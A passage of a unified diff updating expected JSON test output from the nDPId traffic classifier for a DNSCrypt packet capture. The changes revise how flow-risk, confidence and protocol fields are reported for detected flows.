AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAABQtEcAub0RRbIKAAABzbl0dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":200,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":946739311306,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739311306,"pkt":"ZmZmZmZmRERERERECABFAADShQAAADIRADHNuXR0CgAAAQIpqggAvpKvnSmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="}
@@ -423,26 +423,26 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":946739311314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739311314,"pkt":"ZmZmZmZmRERERERECABFAADShQMAADIRAC7NuXR0CgAAAQIplYYAvqc0nSaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgu5AAL0RWGMKAAABNEHrgdoaAbsCCOKYCnMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgu8gAL0RdKIKAAABNEHrgbTpAbsGBA+NCnABAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvBAAL0RWGEKAAABNEHrgc6vAbsCCOKYCnEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgu8Aub0RmXUKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvEgAL0RdKAKAAABNEHrgbpFAbsGBAozCm4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvJAAL0RWF8KAAABNEHrgdqrAbsCCOKYCm8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA